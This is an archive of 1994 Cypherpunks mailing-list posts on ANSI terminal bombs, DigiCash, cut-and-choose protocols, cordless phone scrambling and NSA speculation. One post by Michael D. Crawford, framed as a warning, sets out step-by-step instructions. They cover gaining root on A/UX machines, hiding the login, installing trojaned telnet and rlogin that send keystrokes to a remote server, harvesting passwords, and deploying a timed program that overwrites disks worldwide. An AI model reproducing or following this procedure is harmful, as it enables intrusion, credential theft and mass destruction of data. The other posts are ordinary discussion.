Dec 94 06:17:48 PST Subject: ANSI Bombs are still a threat? (was: Re: Good times virus (ANSI BOMB?)) In-Reply-To: <941207.163507.7y7.rusnews.w165w@cybrspc.mn.org> Message-ID: On Wed, 7 Dec 1994, Roy M. Silvernail wrote: > I wonder if anyone's mail readers are even succeptible? (he > said, grinning) This code altered my screen running Pine 3.89 on an X-terminal hung of an RS/6000 running AIX 3.2.5, much to my surprise! _________________________________________________________________________ Anthony Wm. Iannotti, Network Manager Security APL 101 Hudson Street 201/332-2020 Jersey City, NJ 07302 tony at secapl.com From Paul.Foley at vuw.ac.nz Thu Dec 8 06:40:36 1994 From: Paul.Foley at vuw.ac.nz (Paul Foley) Date: Thu, 8 Dec 94 06:40:36 PST Subject: DigiCash Message-ID: <199412081440.DAA03825@akeake.its.vuw.ac.nz> Could someone explain the concept of "DigiCash" to me, or tell me where to get info from? Thanks. From meconlen at IntNet.net Thu Dec 8 07:50:17 1994 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 8 Dec 94 07:50:17 PST Subject: Moto Secure Clear digital? In-Reply-To: Message-ID: On Thu, 8 Dec 1994, Jonathan Cooper wrote: > > I just got a second phone line, and decided that if I was going to get a 2-line > > phone it might as well be a good one, so I am considering a Motorola Secure > > Clear cordless 2-line phone with speakerphone. This will be quite an investment,so I was wondering whether the Secure Clear phones are digitally encrypted or > > merely scrambled using some analog method. Anybody know about this? How secure > > are these phones really? --Wes > > As I understand it the system is a cheezy form of frequency > inversion. It'll stop your neighbors with a scanner, but that's about it. For digital Encryption you would need a 900Mz phone. Finding one two lines, depending on where you are might be a bit of a search. No 40-50Mz phone I have worked with (Motorola, Toshiba, Panasonic) has used digital encrytion. I would recomend ATT (no I'm not crazy) or Panasonic. Groove on dude Michael Conlen From meconlen at IntNet.net Thu Dec 8 07:53:37 1994 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 8 Dec 94 07:53:37 PST Subject: NYT on Insecure Phones In-Reply-To: Message-ID: On Thu, 8 Dec 1994, Jonathan Cooper wrote: > Cell1 is just not incredibly smart about security, physical or > otherwise. An aquaintance of mine found a "Fraud Alert Bulletin" in a > Cellular One trash can which warned about the dangers of not shredding > your trash. Of course, in the same bag was wads of credit card info, NAM > & ESN info, etc. Nor will they hesadate to give out Cellular programming info over the phone if you can find there Internal Customer Care phone number, found by looking at a Cellular One display such as the one's Circuit City is using in West Florida Groove on dude Michael Conlen From meconlen at IntNet.net Thu Dec 8 07:57:14 1994 From: meconlen at IntNet.net (Michael Conlen) Date: Thu, 8 Dec 94 07:57:14 PST Subject: My apologies to the list (Re: ANSI Bombs are still a threat?) In-Reply-To: <941207.234039.2D7.rusnews.w165w@cybrspc.mn.org> Message-ID: On Wed, 7 Dec 1994, Roy M. Silvernail wrote: > That person asks that I post instructions for recovering from so heinous > an attack. All I can suggest is escaping to a shell and doing a 'clear' > (or, under MS-DOS, 'cls'). I have found that some attacks that leave your screen doing strange things can be recoverd from by ussing the talk command. This program, on UNIX machines seems to reset alot of things that might have gone array with your screen. Groove on Dude Michael Conlen From samman at CS.YALE.EDU Thu Dec 8 09:01:34 1994 From: samman at CS.YALE.EDU (Ben) Date: Thu, 8 Dec 94 09:01:34 PST Subject: My apologies to the list (Re: ANSI Bombs are still a threat?) In-Reply-To: Message-ID: > > > On Wed, 7 Dec 1994, Roy M. Silvernail wrote: > > > That person asks that I post instructions for recovering from so heinous > > an attack. All I can suggest is escaping to a shell and doing a 'clear' > > (or, under MS-DOS, 'cls'). > > I have found that some attacks that leave your screen doing strange > things can be recoverd from by ussing the talk command. This program, on > UNIX machines seems to reset alot of things that might have gone array > with your screen. If you hit the control button with both mouse buttons at the same time in twm(an X windows manager) there pops up a menu--choose the 'reset terminal' option. Ben. Who's not signing cause the DEC Rainbow he's using to dial in isn't secure. From Tony.Gurnick at nzdairy.co.nz Thu Dec 8 09:51:22 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 8 Dec 94 09:51:22 PST Subject: Purdy & hickory Message-ID: <94120906494434@nzdairy.co.nz> Does anyone have any info on the PURDY & HICKORY hash algorithms that VMS uses in its authentication services! Thanks T From rseymour at reed.edu Thu Dec 8 10:02:38 1994 From: rseymour at reed.edu (Robert Seymour) Date: Thu, 8 Dec 94 10:02:38 PST Subject: Fixing Flash/ANSI Bomb/Terminal Screwup In-Reply-To: Message-ID: In the world according to Ben: > > On Wed, 7 Dec 1994, Roy M. Silvernail wrote: > > > That person asks that I post instructions for recovering from so heinous > > > an attack. All I can suggest is escaping to a shell and doing a 'clear' > > > (or, under MS-DOS, 'cls'). > > I have found that some attacks that leave your screen doing strange > > things can be recoverd from by ussing the talk command. This program, on > > UNIX machines seems to reset alot of things that might have gone array > > with your screen. > If you hit the control button with both mouse buttons at the same time in > twm(an X windows manager) there pops up a menu--choose the 'reset > terminal' option. Flash/ANSI Bomb/terminal codes or just general screwups can be quite a pain. Though the methods suggested above may work in some circumstances, they won't work all the time. One method I have found to be quick and highly effective is the following alias (shown from my bash rcfile, but you can easily translate to other shells): ## This last one is a nifty little way to fix the terminal after being ## flashed or otherwise messed up by some program. If your terminal is ## really screwed up, it may not be able to parse the return (^M) correctly. ## If so, use linefeed (^J), then type "sanity", then type another linefeed. alias sanity='stty 500:5:96c:3b:0:3:1c:8:17:4:0:0:0:500:5:96c:8000003b:3:1c:8:17 :4:0:0:0:ff:ff:ff:4:0:1a:11:13:0:0:1a:ff' (N.B.: make sure that is one line for the alias). Unfortunately this does assume that your terminal is at least semi-clued (i.e. minimal vt100 features, but it should be able to get your back to a sane setup wherein you can re- source your own rcfiles or set the terminal paramters yourself. There is also a script called unflash which will fix basic terminal codes attacks, but it is less robust (it just echos {esc}c {esc}0 and clears the screen, which will end text properties but not neccesarily fix status lines and other problems). If you use it, let me know how this generalizes, its been quite stable in my experience. The real tough one to deal with is xterm, which can have font properties set through escape codes, a well designed talk request, terminal write, or irc bomb can make it entirely unintelligible and very difficult to recover. Get you admin to install a good fingerd/talkd and/or use mesg n to prevent access in the first place. There are several around now which disallow terminal codes in the talk requesters id and check IPs, etc. |Robert -- Robert Seymour rseymour at reed.edu Reed College Artificial Life Project NeXTmail, MIME, PGP accepted WWW Pages From Tony.Gurnick at nzdairy.co.nz Thu Dec 8 10:20:54 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 8 Dec 94 10:20:54 PST Subject: Breaking the NSA Message-ID: <94120907194944@nzdairy.co.nz> Frenchie wrote >Tony.Gurnick at nzdairy.co.nz wrote: > >>Frenchie Wrote >> >> Not that easy. They would just crack the code and *another* >> acronym based agency would come up with a different reason to >> seize you and your computer. It would seem unrelated to anyone >> but *you* since you would know what you did but would have no >> way to prove that your original infraction is why you are doin' >> time. Hope that makes some sense. >> >>Maybe. What if the only way to do this was illegal? > > Then you would have to hope you never do anything illegal. Then > no (pick your acronym) agency would be able to easily trump up > a charge that could be used as an infiltration technique to get > to your system *legally*. If they want to bad enuff I'm sure > breaking the law to catch you doing something would be arranged. > Violating National Interests maybe? > Um, you would still know pgp/rsa/idea has been broken??? >> If it isn't something *really good* they probably wouldn't come after >> you anyway. > >>Whats the definition of GOOD? > > PGP?...3xDES?....RC5?....plans for an A-Bomb with instructions for > construction and location of available nuclear material?...pick one. Yeah Thats pretty good >> #3 I can agree with. I don't think that NSA would tip their hand >> and let on to us that they can read our stuff. At least, not directly. > >>We may as well find out. > > Agreed, the problem is finding a way to be sure! A little > misinformation has a habit of going a long way. Huh? >> One more thing. Don't you think that they subscribe to the Cypherpunk >> list just to see this kind of logic? > >>Maybe, But isnt freedom of speech what this list is about and what your >>constitution does! > > > Be careful...not everyone here is a U.S. resident or citizen. > At least I don't think so. > But since I am I know how precariously balanced the definition > of free specch is. The Supreme Court in cahoots with law > enforcement and lawmakers could change things pretty quick! > Throw in a handy list of names......u know the rest. Well Im not one (a us cit i mean), but another way of putting what I said is Its like some private company invents a cipher and you break it And they get pissed at you for doing it. But you did them a favour really cause someone more unscrupulous than you wouldnt have told them. So the NSA should be glad, and encourage us to speak like this and I think we should continue along this track! Unless of course they wish to comment....? > BTW....I ain't one of 'em, and I wouldn't tell if I was. :) >>Prove it >[I see my smiley was disregarded] Sorry, I forgot my smile, I was quite busy yesterday and thought I could get a quick reply in. I bolloxed that up! Heres two )) >Proof you say! >A classical dilemma: > If I say I am (one of them) it implies gathering > intelligence or a reason to sow suspicion even if I am not. > Denial implies I am what I say I am not. > So, even though I am not, it would be impossible to *convince* > you of that. If I was I still couldn't produce *believable* > evidence to support the statement. > Take my advice: Don't Trust Nobody. Thats a good one >Is there a reason *you* don't sign your messages? Hehehe.... :) Cause I forgot...busy...chicken! T From jamesd at netcom.com Thu Dec 8 10:26:41 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 8 Dec 94 10:26:41 PST Subject: DigiCash In-Reply-To: <199412081440.DAA03825@akeake.its.vuw.ac.nz> Message-ID: <199412081826.KAA08641@netcom10.netcom.com> Paul Foley writes > > Could someone explain the concept of "DigiCash" to me, or tell me where to > get info from? > > Thanks. http://www.digicash.com/ Click on publications. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From alex at omaha.com Thu Dec 8 12:09:51 1994 From: alex at omaha.com (Alex Strasheim) Date: Thu, 8 Dec 94 12:09:51 PST Subject: cut & choose Message-ID: <199412082010.OAA00148@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- In Applied Cryptography, Schneier describes digital cash protocols that depend on the cut and choose method: Alice prepares 100 anonymous money orders for $100, sends them all to the bank, which opens all the envelopes except one picked at random. If the 99 envelopes checked have money orders for $100, then the bank is confident that the one they sign blindly will be for $100 as well. Chaum's system uses different keys for different denominations. Alice only sends one envelope, and the bank uses its $100 key to sign it. I don't understand why anyone would use the cut and choose protocol over denominated keys. Chaum's method seems a lot cleaner to me and more secure. It obviously uses less bandwidth. What am I missing here? == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLudoHxEpP7+baaPtAQFIiwQAsCc/TYI/cgJyGf6AtykBGgu+qJJ+peM6 /IYXnUzrIeFLx54nRjsUOUFYJs6Uu3vu6s2BRbd2/YIJVaY6/kP4HO0zuMhqFn2z 4eddRverUeH59IZgZ+4Va4/rgfn5hRdNSOgNinIyk0aRsa8ulR+cmJdUYqggHgd5 w2dxkAtDSGM= =fzJT -----END PGP SIGNATURE----- From mccoy at io.com Thu Dec 8 12:53:00 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 8 Dec 94 12:53:00 PST Subject: cut & choose In-Reply-To: <199412082010.OAA00148@omaha.omaha.com> Message-ID: <199412082052.OAA21137@pentagon.io.com> > From: Alex Strasheim > > In Applied Cryptography, Schneier describes digital cash protocols that > depend on the cut and choose method [...] Chaum's system uses different > keys for different denominations. [...] > > I don't understand why anyone would use the cut and choose protocol over > denominated keys. Chaum's method seems a lot cleaner to me and more > secure. It obviously uses less bandwidth. What am I missing here? Cut and choose is necessary for several protocols. It is necessary for cash protocols that do not use blinding, it is necessary for the cash protocols that include identification, and in general it is necessary for any protocol where the signer does not know the contents of what they are signing _and_ the contents need to be formed in a particular fashion. Denominated keys requires the user (the one accepting the packet and verifying it) to keep track of more information, such as which keys correspond to which denominations. In cut and choose the end user only needs to know one key and the other information is carried in the packet itself. There is a cost in each system, it is just a question of who bears the cost and what abilities the cost gives the system... jim From crawford at scruznet.com Thu Dec 8 16:25:01 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Thu, 8 Dec 94 16:25:01 PST Subject: How to Destroy the Internet (was Info about Linux) Message-ID: <199412090022.QAA09606@scruz.net> -----BEGIN PGP SIGNED MESSAGE----- I write: > You don't need to have a firewall to tighten up the security on your > machine. Read this book if you're going to put a Unix box of any sort on > the Internet, or you might wake up some day to find someone's erased your > hard disk from the other side of the globe. > Matt Bartley writes > Is it that dangerous? I wonder how machines in college, which didn't > have firewall protection that I know of, survived. Then again, that > was close to 3 years ago - maybe things are worse now. Before I proceed, let me point out that the following procedure has been documented for more than five years. Some may regards it as irresponsible to publish this information, but I consider it a greater danger that many Unix machine owners fail to appreciate the seriousness of this problem. How to erase the hard disk of almost every Unix machine on the Internet: Apple's A/UX 2.0 was, at least initially, shipped with two well-known security holes, holes which had been documented for years in the CERT advisories. When I was the MacTCP test engineer at Apple, I beta tested A/UX, found these holes, and tried very hard to get Apple to close them before shipping the product, which was primarily meant as Apple's candidate for an $80 million Air Force contract. I found this pretty ironic, but when I griped about it at Apple - and I griped about it increasingly loudly as the ship date approached - all I got was sternly scolded. Apple's internal netadmins did invite to play "capture /flag" on their internal net Unix machines, which was fun. I never could break into /flag. Security hole #1: A/UX ships with the guest login enabled, with no password. Thus anyone can log in to any A/UX machine on the Internet. Security hole #2: A/UX was largely derived from SunOS, and shared a hole with older versions of SunOS. The /etc/utmp file is world writable. The reason this is done is so that shell windows in the MacOS process on A/UX, or under SunView on the Sun, can appear to be logged in terminals, I think mainly to allow "wall" to write messages to all the windows. This is a deadly error. If /etc/utmp is world writable, anyone who can log in, with a little practice, can become root and cover evidence of their login in about 30 seconds. This is done as follows: 0. Using HINFO records from the name service, and looking at the SMTP, FTP, and login banners of many machines on the Internet, collect the addresses of many A/UX machines. For each A/UX machine do 1 - 15: 1. On your local machine, running the window system of your choice, type in a no-password passwd file entry for root into a window. Leave the window open. 2. On your local machine, create a file in utmp format in which ../tmp/foo is the only logged in terminal. Copy it to the clipboard (this will be a binary file - you have to write a small C program to create it). 3. Log in as guest over the internet. 4. cat /etc/utmp | od -h 5 cp /etc/passwd /tmp/Ex12345 6. cat > /etc/utmp 7. Paste the contents of your clipboard into the terminal window and press control-D. Now you've made /dev/../tmp/foo the only terminal which appears to be logged in. 8. ln -s /etc/passwd /tmp/foo 9. rwall "root::0:0::/:/bin/sh". This message is broadcast to all logged in terminals, thus replacing the password file with your own. 10. su ... now you are root. Time to cover your tracks! 11. mv /tmp/Ex12345 /etc/passwd 12. Copy the hex dump that just scrolled by on your screen to the clipboard. Paste it into a program that you have written that converts it back into binary, removes all the guest login records from it, and places the result back on the clipboard. 13. cat > /etc/utmp ... paste into the terminal window and press ^D. 14. Relax. Take a break and look upon your handiwork. The only evidence of your connection is the existence of a couple of shell processes and a telnet or rlogin daemon. "who" or "users" will not show you; the machine's users will have to examine ps listings very carefully to see that you are logged in. 15. When you've sufficiently regained your composure, use ftp to fetch patched telnet and rlogin binaries from your machine. With telnet you could just set the debug flag to dribble all the user's keystrokes into a file, but it would have more finesse to send a UDP packet of the first few keystrokes of each session to a server you have somewhere on the internet. 16. Collect passwords to every machine that allows logins from the machine you have just hacked. If you get any root passwords, go to step 15. (be sure to collect enough keystrokes to catch any su's that are done after logging in as a regular use. If the passwords are to any other A/UX machines, or old SunOS machines, go to step 4. 17. After you have collected lots of root passwords, right a C program that will wait for a certain delay, then turn off all networking using ifconfig (to prevent the admin from getting in and stopping the damage), mmap the raw partitions of all the mounted hard disks, make sure that the whole program is sitting in physical ram, then write garbage into the mmap'ed memory blocks. Install this program on all your target machines, with the delay synchronized to each system's own clock so that the damage happens simultaneously worldwide. You will probably want to distribute installation programs to a few dozen of your hacked machines, and have them all install on the machines nearby, to prevent word from getting out before the installations are all complete. If you're lucky, you can get the passwords to some backbone routers and partition the internet to help prevent the spread of the warning. The reason your college's machines have not been hacked yet, is because there are many machines on the internet, and the hackers have not got around to it yet. Read Firewalls and Internet Security, by William R. Cheswick and Steven M. Bellovin, ISBN 0-201-63357-4, before this happens to you. Any machine that allows logins from your own machine will be compromised, if your machine is compromised. Every machine that allows logins from any machine that allows logins from you will then be compromised, and so on. If the security is not tightened up considerably on the hosts connected to the Internet, someone's going to do something like this and bring the whole thing down. The Morris Worm did a great deal of damage to the net, but did little in the way of monetary damage beyond wasted employee time. Something like this would do damage in the billions of dollars. Regards, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLucy8aJTibhK6XY5AQFyYgQAgHD4jMeXAt9iQ4h266nyP8jQcSYGUzCZ mbXCHiDEjmPLCqrFvLJv+5QiCVvCKVvjVLJzoJ5id7f8YiJFZFLqxVeLlUj9ZqxM jSrETQYUEv81dypYAZkTnFuZMU+VuGUBBFjjTIMUcRo+CCvgfyA6Tb3Fhfz2qGIW d4qjDuT7Jyc= =GcJ2 -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCPAy7JYr8AAAEEAJ4GpoYcH5abkSq5FZQ9LxoP9oKKQDXHRGZT8QCcnVZ8o87H p9kEaUJIyzGbMHpO7C09qShwcrII2VfCZ77iWlBglmdLEa/dKXRCSWMFF52RcSDh zJF8m0wE2SZ9x4Y6KuXM3RwJVdEKLhsAImxckvfj0UBvb5xtJ6JTibhK6XY5ABEB AAG0LU1pY2hhZWwgRC4gQ3Jhd2ZvcmQgPGNyYXdmb3JkQHNjaXBwLnVjc2MuZWR1 PokAlQMFEC7JZBeiU4m4Sul2OQEBpFID/jz5/tGopduwskgTHxvQDRe4D/rvUHov s+ILcFLmQyFC0iVHEWWBMtSnTcPZOVsTKqhonDAiMTvWTf5XaszvXZYaIOVBJGO2 tTbX9AM3NtkLjyv6lQE7tssd7/XoQPy2CxI40f7sMh1AbDq43W/hpOI6TYfGAMcZ rdGMR7But9bb =kSZf -----END PGP PUBLIC KEY BLOCK----- Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From eric at remailer.net Thu Dec 8 17:29:35 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 8 Dec 94 17:29:35 PST Subject: backing ecash In-Reply-To: <199412050431.WAA00176@omaha.omaha.com> Message-ID: <199412090227.SAA24809@largo.remailer.net> From: Alex Strasheim Suppose Digicash opened up a digital currency exchange in Amsterdam. [...] Left unexamined here are the ways in which various things can go wrong. Edollars would still have value here in Lincoln, NE USA. How much? Not full value, that's for sure, because of the risk cost associated with getting the edollars back to Amsterdam. What happens when womthing goes wrong in Amsterdam? What happens? What effective recourse does a USA holder have with respect to a Netherlands company? Your basic idea, however, is right on target, that you don't need to be a bank to issue digital currency. On the other hand, with that realization your problems are only beginning. Eric From eric at remailer.net Thu Dec 8 17:36:43 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 8 Dec 94 17:36:43 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting In-Reply-To: <9412070253.AA07672@snark.imsi.com> Message-ID: <199412090234.SAA24815@largo.remailer.net> Aren't there multicast provisions at SGI? Eric? We may be multicasting this weekend. Far more important than my involvement is that of our host there at SGI, Katy. Her crew gets the MBONE running. There are some fiddly things with the SGI firewall, etc., that I just don't understand. So I'm passing the buck. Katy? Eric From dave at esi.COM.AU Thu Dec 8 18:02:43 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Thu, 8 Dec 94 18:02:43 PST Subject: Breaking the NSA In-Reply-To: <9412081408.ZM999@wiley.sydney.sgi.com> Message-ID: On Thu, 8 Dec 1994, Ian Farquhar wrote: > I am told that a similar trick was tried by some people back in the > early 1980's, when they were trying to figure out if the NSA could > indeed break DES. There was no official response to these attempts. Or then again, maybe the people involved suddenly had the last 10 years or so of their tax returns scrutinised; maybe they were denied social benefits; etc. -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From nobody at CSUA.Berkeley.EDU Thu Dec 8 18:25:23 1994 From: nobody at CSUA.Berkeley.EDU (Tommy the Tourist (Anon User)) Date: Thu, 8 Dec 94 18:25:23 PST Subject: A disturbing story Message-ID: <199412090224.SAA17068@soda.CSUA.Berkeley.EDU> Check out the story "CIA to pay $410 000 to maligned female officer" in Thursday's SF Chronicle (http://sfgate.com/new/schron/dec-08-94/mn1199.html). The interesting part isn't the stuff about sexual harassment. The interesting thing were paragraphs 8 and 9: >For example, Brookner was accused by the CIA's inspector general of >drunkenly pawing a male subordinate at a 1990 Christmas party at her home in >Jamaica. > >But the government lawyers defending the CIA then said that the man was not >a subordinate, but a high-ranking Drug Enforcement Administration official >who attended the party. Why would there be a high-ranking DEA official at a CIA Christmas party? Hmmm. ------------ To respond to the sender of this message, send mail to remailer at soda.berkeley.edu, starting your message with the following 7 lines: :: Response-Key: the-clipper-key ====Encrypted-Sender-Begin==== MI@```%)^&2?(E Message-ID: <9412090252.AA29178@mycroft.rand.org> > "Ian Farquhar" writes: > I am told that a similar trick was tried by some people back in the > early 1980's, when they were trying to figure out if the NSA could > indeed break DES. There was no official response to these attempts. When I ported Adventure (the original 350-point version) to Unix in 1976 I used a light interrupted-key Vigenere-like encryption on the database. I heard through a circuitous route a little later that some of the players at NSA had found it easier (or perhaps more fun) to solve the database than to solve the game. In the next version (abt 1978) I used DES on the database (yes, I know somebody could disassemble it and find where I left the key, but that's not terribly trivial either for a program that size). I never heard back one way or the other whether they'd hacked it again. Jim Gillogly 19 Foreyule S.R. 1994, 02:50 From skaplin at skypoint.com Thu Dec 8 19:33:31 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Thu, 8 Dec 94 19:33:31 PST Subject: 2048-bit keys?? In-Reply-To: <199412042331.PAA14197@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412042331.PAA14197 at jobe.shell.portal.com>, you wrote: > just curious, how many random bytes does it take to generate these > fuckers and can the keyservers out their handle em yet? I don't know about the servers, but I am told viacrypt can't handle them. I tried to upload my big key to sled for verification and according to them viacrypt choked on it...strange. ============================================================================== Those who cannot remember the past are condemned to repeat it. - George Santayana ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLufOx8lnXxBRSgfNAQHLqgf+MEcxerNQPdGbFubDamnLxM0LzDSYRhzd 2urA7xvt/YC15cUFbmfJFeDbAW+vlBTM+e9IgbQmJ1kryXwcI0mAHMvFOjuCwJVw Qadf5xLEkXbl0OADxh+J/Ck23rrvD3IIK5l5rF/MFGUn/NaorBc3Yd67I0iTSv0t I+4maRdzH/8Xalp6biHCJFuU0rlvnaP/Psn7aZ9UVUmm/FaLujWseZP3T5+HTBu0 3eDnkM1PLU4q+7XY1aJP2zcb/toe3b7xDIcD1G29XxqHeBE9SBlzlPnk2dytjFod sQjUOvLDTJXMi2g3jdg9q5mos0Fb3aNUDCq1l4CezxmplcTt/UY4Fg== =4j8r -----END PGP SIGNATURE----- This message digitally signed to verify the identity of the writer. From jamesh at netcom.com Thu Dec 8 19:56:22 1994 From: jamesh at netcom.com (jamesh at netcom.com) Date: Thu, 8 Dec 94 19:56:22 PST Subject: A disturbing story In-Reply-To: <199412090224.SAA17068@soda.CSUA.Berkeley.EDU> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > > > Why would there be a high-ranking DEA official at a CIA Christmas party? > Keeping an eye on the LAPD traning officer? JJH - ------------------------------------------------------------------------------- Oh Yeah: Disclaimer, Disclaimer, Disclaimer, The views expressed belong only to me (and maybe Courtny). It should not reflect on any others (except Mario from Canada, a real perv). -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLup5BNHyeQuAHp1JAQFygwQA1enwH6g0kykYhZ/MPGyYQ1paLcncplFY HnqiNyonrX41KBe2AkEQKpHwmDSkay490yWAoa2czi4sQzDNR2Rww6srfj1UK5ya XztfSxu2ZXbNGucUgQ8gco4tZUqPaN51SGnxRLyNwLN4Jlao8KI7FMZyduKBzJWE MVkQY2KIXpc= =McbX -----END PGP SIGNATURE----- From ktk at anemone.corp.sgi.com Thu Dec 8 23:12:58 1994 From: ktk at anemone.corp.sgi.com (Katy Kislitzin) Date: Thu, 8 Dec 94 23:12:58 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting In-Reply-To: <199412090234.SAA24815@largo.remailer.net> Message-ID: <9412090712.AA28021@anemone.corp.sgi.com> i've decided to punt on mbone for now... technical difficulties have plauged making it happen. seems like many things can happen between a fri afternoon setup and a sat broadcast. will try again, probably in feb, but not for this meeting. --kt From claborne at microcosm.sandiegoca.NCR.COM Fri Dec 9 00:27:26 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Fri, 9 Dec 94 00:27:26 PST Subject: Moto Secure Clear digital? Message-ID: <2EE773EF@microcosm.SanDiegoCA.NCR.COM> I got one a while back and I don't like it. The range is poor and the sound quality is not all that great. A novice newby can't break it but anyone with experience can. I've seen posts on how it works but can't remember. AT&T has some kind of security feature on their 900Mhz phone but I haven't looked into it. 2 -- C -- >From: Jonathan Cooper >--------------------------------------------------------------------------- --- >> I just got a second phone line, and decided that if I was going to get a >2-line >> phone it might as well be a good one, so I am considering a Motorola Secure >> Clear cordless 2-line phone with speakerphone. This will be quite an >investment,so I was wondering whether the Secure Clear phones are digitally >encrypted or >> merely scrambled using some analog method. Anybody know about this? How >secure >> are these phones really? --Wes > > As I understand it the system is a cheezy form of frequency >inversion. It'll stop your neighbors with a scanner, but that's about it. > >-jon > >( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) >( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) > > From eric at remailer.net Fri Dec 9 05:43:46 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 9 Dec 94 05:43:46 PST Subject: Anonymity in the foreign exchange markets Message-ID: <199412091441.GAA25607@largo.remailer.net> The following two page spread advertisement is from the Economist Nov 12, 1994. -------------------------------------------- Wouldn't the speculators love to know where you DM2.5 billion is right now. Your government has just raised DM2.5 billion. Your task is to convert those Deutsche marks into the currency of your country. And a whole world of speculators can't wait. They know they can make money at your expense by detecting and anticipating such a large currency move. But you have a surprise for them. Your currency is moving through the international markets right now -- right under the speculator's noses -- and they haven't a clue. Because you've found a firm that is more than a leading international trader. It's a select group of professionals -- strategists, researchers and economists with their own technology, their own global network and a distinctive approach to foreign exchange. They monitor the capital markets, not just trade flows, to get a more accurate picture of currency trends. Their strategic thinking helps pinpoint when -- and when not -- to make certain currency moves. And while they deal in all currencies, all markets and all size transactions, large positions such as yours are handled with special discretion. That's why, right now, your DM2.5 billion has been divided up -- into trades small enough to be undetected but large enough to be cost-efficient -- and blended strategically into the firm's daily global business. Most importantly, when the trading becomes fast and furious, these people make sure your transactions come first. You know they'll see you through it all. MORGAN STANLEY [The picture is of a chameleon.] -------------------------------------------- Note that not only are they selling anonymization services for *huge* sizes, they're also selling traffic analysis avoidance. >From what I know about the business, a typical commission is 1%, or somewhere around $10 million for th advertised transaction. Eric From Agorist003 at aol.com Fri Dec 9 05:48:27 1994 From: Agorist003 at aol.com (Agorist003 at aol.com) Date: Fri, 9 Dec 94 05:48:27 PST Subject: L.A. area meeting Message-ID: <941209084822_1476905@aol.com> There will be a meeting under the announced name "L.A. Cypherpunks" at the California Coffee House, 4455 Overland Avenue, Culver City, CA 90230 (310) 559-8868 to discuss privacy issues and tactics. If any of y'all want to show up and flame on about your pet projects and sell stuff, it is a free, informal gathering -- show up any time between noon and 5 P.M. BCNU! Kent - jkh at story.com (If wsb gets fixed again) From sinclai at ecf.toronto.edu Fri Dec 9 06:53:36 1994 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Fri, 9 Dec 94 06:53:36 PST Subject: Secure DAC? Message-ID: <94Dec9.095259edt.3818@cannon.ecf.toronto.edu> -----BEGIN PGP SIGNED MESSAGE----- I was looking through the PMI analog IC databook from 1988. Specifically, I was looking at the "DAC-08 8-bit high-speed multiplying D/A converter". The chip is interesting in that it has two outputs. One is the current corresponding to the digital value on the input lines, and the other is the current corresponding to NOT the digital values. Thus, the two currents sum to a constant. The book says: "Power consuption may be calculated as follows: Pd = (I+) (V+) + (I-) (V-). A useful feature of the DAC-08 design is that supply current is constand and independent of input logic states; this is useful in cryptographic applications and further serves to ^^^^^^^^^^^^^ reduce the size of the power supply bypass capacitors." -- Page 11-34. All typos mine. I fail to see how this would increase cryptographic potential. However, it would seem to mask the device's EMR. The application notes state that it is useful in CRT display drivers, audio encoders, &c. These are all devices that are succeptable to TEMPEST monitoring (or whatever the correct name is). If one output goes to the desired next stage (the electron gun in a CRT for example) and the other goes to a matched dummy load, it would seem that the overall EMR is constant. This approach would obliviate the need for bulky shielding, though it might not be as secure. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLuhtmcyi36CIyUXVAQHPOgQAtfWIF40YQU+pYhYok734qzePhkDmmaaR 8WLXVB9UvZBi7psIuXRsXoKkODaQIJecQZ6UsIrEfBr1Lor+ZBe7e7fOpWiO5jkE gMC+/a62z4xOyr4ukrEsZPG4WfHLR1SSob+CFla/JjiL2Hp3+I2wgtieY7KHTn0m 13Zpr/eayLM= =F8pd -----END PGP SIGNATURE----- From eric at remailer.net Fri Dec 9 07:20:04 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 9 Dec 94 07:20:04 PST Subject: Secure DAC? In-Reply-To: <94Dec9.095259edt.3818@cannon.ecf.toronto.edu> Message-ID: <199412091618.IAA25744@largo.remailer.net> From: SINCLAIR DOUGLAS N [re: a constant 